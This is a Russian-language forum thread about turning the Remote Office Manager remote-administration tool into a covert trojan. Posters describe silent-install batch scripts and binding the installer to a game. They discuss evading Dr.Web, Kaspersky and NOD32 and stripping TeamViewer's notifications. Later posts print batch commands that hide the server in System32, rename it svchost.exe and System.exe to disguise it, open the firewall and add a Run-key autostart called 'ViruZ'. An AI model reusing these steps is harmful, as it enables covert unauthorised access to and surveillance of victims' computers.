![]() |
[Обновлено] Remote Office Manager - конкурент RAdmin'a
|
Достойная альтернатива RA, пользуемся уже год (RA отложен на долго в ящик)
Имеюся некоторые незначительные глюки, но с выходом более новой версии наверно их не будет. Та версия что есть у нас не работает под Vista (новая наверно уже пашет). |
вопросик по поводу этого сервиса с привязкой домена к айпи:
там чето попробывал получилось что каждый раз при смене динамического айпи надо заходить в настройки и применять новый айпишник так, не? ну и как сделать чтоб софтина сама отсылала айпи и он автоматом менялся на сайте? сайтег бесплатно не пашет? |
Цитата:
|
Перезалейте куданить в другое место плиз! Лучше на дамп.ру!!!!
|
Цитата:
|
обновил ссылки в посте #1
|
Хорошая наверное весчь,но мне как то предварительно обработанный TeamViewer
проще!Никаких тебе ип,шлёт себе на РНР скрипт данные для подключения и всё! Дополнительный модуль,дллка всего то 4 кб весит. |
Это ведь вполне легальное дело и не предназначен он для таких всяких дел!
И работает ли насколько он в чистом виде!?TeamViewer и в одном файле хорошо свою работу делает!Можно плаг дописать,изменить по своему усмотрению!Тыж прогер,не то что я,не мог не заметить! |
в принципе - тим вивер вообщем-то довольно крутой вариант, его только допилить нужно, сделать отправку номера сессии на http или на почту, убрать все уведомления по-умолчанию разрещить любые действия. Лично я юзаю UltraVNC
|
установил скрипт из шапки, сервер запрашивает пароль, кто знает? пробывал и 123... не идет!
|
поставь радмин обычный, где есть настройки, задай свой пароль, а потом сделай экспорт, а ваще радмин 2.2 уже имхо неактуально, хотя смотря как заливать возможно.
|
радмин то я без проблем впариваю ещё и ip приходит на почту :) токо утилита доктора-веба палит его на раз :( а этот встал без проблем и антивири молчат ))) токо сервак пароль требует, автору срипта писал в личку, пока молчит.
|
Цитата:
Цитата:
PS На офф сайте вышла новая бэта. сейчас каспер ругается на 2 файла из версии 3.3.3, т.е. та, про которую идёт речь в статье. Бэту 3.4 проверял нодом и каспером - всё ок ;) |
теперь понял )))
|
Зачем такие заморочки?!
установите LogMein и забудьте раз и навсегда проблему удаленной слежки и доступа. утилита для удаленного доступа к компьютеру и его ресурсам. Пользователь может подключаться из любой точки мира, имеющей выход в интернет, будь то система Mac OS X или Windows, и работать на своем домашнем компьютере, как будто он за ним сидит. |
Цитата:
а слабо кинуть сылку на крякнутую версию и рабочую а еще лудше оформить в статью??? |
А где в настройках ROMa, указать мой ип для Обратного соединения?
|
Теперь и НОДом стал палиться...
|
А видео по настройке есть??? С динам айпи...... ....
|
Огромное конешно спс за такие идеи, но вот я начинающий и очень хочется по полробнее, или видео или описание, а так канечно всё выглядит круто.
|
Цитата:
|
Цитата:
|
кстати напишу обьяснение для всех, как получается троян из такой программы управления.
Сначало просто устанавливаете у себя на компе серверную часть, потом собираете в одну папку все файлы каторые раскидала прога, тоесть то что записалось в папку Program Files и в WINDOWS потом экспортируете то что записала эта программа в реестр. и наконецто делаете батничек(.bat) который раскидает эти файлы по темже местам и импортирует этот файлик реестра. Всё соединяете в одно целое так чтобы при нажатии на это запускался ваш батник, и всё. |
del del
|
склеивать рому с игрой можно... я для склейки использую Bat To Exe Converter.. просто в конце батника прописываешь с новой строки имя_игры.exe и после установки ромы запустится игра
|
Спасибо.
|
В догонку про рому
по ходу уже палится AVP Kaspesky, Eset NOD32, Symantec.... :( :(
|
2 valman
попробуй запустить с правами администратора или выключить UAC ( или как он там)) ) |
Цитата:
|
Вопрос первый, - что это за палево в твоем батнике?:
echo set WshShell = CreateObject("WScript.Shell") >>1.vbs echo BtnCode = WshShell.Popup("Fatal Error: Ошибка запуска!", 0, "Fatal Error", 0 + 16) >>1.vbs cscript 1.vbs del 1.vbs Вопрос номер два, - почему размер файлов в твоем РОМе не соответствует реальным размерам исходных файлов? |
При запуске твоего батника выкдывает сообщение что системе не удаётся найти указанынй файл. Ты батник вообще для какой системы делал? короче палёный батник конкертно.
Сделай людский батник под Висту!! |
Цитата:
что тут палевного? я в видео написал, что эти стороки можно удалить! смотри всё внимательно. что касаемо размера файлов, то в распакованном состоянии они весят 4мб а в архиве могут сжаться где-то в 2-3 раза |
Где в реестре можно прописать запуск ROMServer.exe на постоянке? Run и RunServices не пашут
|
Цитата:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "ViruZ" /t REG_SZ /d "%SystemRoot%\system32\ViruZ.bat" /f >nul вот команда в батнике |
Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом
|
Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом, в регистрах его нигде нет, в автозапуске тоже нет, в регистре Run и RunServices тоже отсутствует. Как оно может вообще запускаться? Но оно запускается и работает так как я и хотел, но не думаю что будет работать постоянно и не думаю что обакновенная комманда из БАТника типа silentinstall прописывает его в регситры на долгие века.
Можешь мне разъяснить принцип автозапуска ROMServer.exe? Может есть смысл кинуть файл в папку system32, тогда как конкретно должен выглядить REG файл с коммандой для прописи в папке %SystemRoot%\System32\ROMServer.exe ? и нужно ли кидать и все остальные файлы в директорию System32?[/QUOTE] Если ты про то как он попадает в автозапуск, то это в настройках сервера само стоит автозагрузка, такчто трой сам будет запускатся постоянно. а про то как переделать всё под папку System32 то не надо переписывать фаил с расширением REG в нём всё и так пойдёт, тебе только батник переписать надо так mkdir "%SYSTEMROOT%\System32\sistem" copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\System32\sistem\AledensoftIpcServer. dll" copy /y "English.lg" "%SYSTEMROOT%\System32\sistem\English.lg" copy /y "EULA.rtf" "%SYSTEMROOT%\System32\sistem\EULA.rtf" copy /y "HookDrv.dll" "%SYSTEMROOT%\System32\sistem\HookDrv.dll" copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\System32\sistem\svchost.exe" copy /y "ROMServer.exe" "%SYSTEMROOT%\System32\sistem\System.exe" copy /y "ROMwln.dll" "%SYSTEMROOT%\System32\sistem\ROMwln.dll" copy /y "Russian.lg" "%SYSTEMROOT%\System32\sistem\Russian.lg" "%SYSTEMROOT%\System32\sistem\System.exe" /silentinstall "%SYSTEMROOT%\System32\sistem\System.exe" /firewall reg import "settings.reg" regedit /s "settings.reg" "%SYSTEMROOT%/System32\sistem\System.exe" /start видеш как тут сделано? ROMServer.exe переименовывайтся в System.exe так он будет отображатся в процессах диспетчкра , я думаю врятли кто рескнёт закрывать такой процесс.... а вот этой строчкой создаётся папка в которую кинутся всё нужные файлы mkdir "%SYSTEMROOT%\System32\sistem |
Самое интересное что файлы с названием system.exe итд не работают, тобишь не запускаются.
Еще, батник при запуске с "%SYSTEMROOT%/System32\sistem\ROMServer.exe" /start показывает ошибку что не может найти файл для запуска, то же самое показывает при запуске с %WindowsDir% или %SystemDir%. Тупо не хочет находить там файлы (хотя они там есть) работает при запуске только с %ProgramFiles%. Что это может быть? У меня Виста. |
Цитата:
|
Цитата:
Код:
"%SYSTEMROOT%\System32\sistem\ROMServer.exe" /startКод:
echo %ProgramFiles% |
| Время: 22:09 |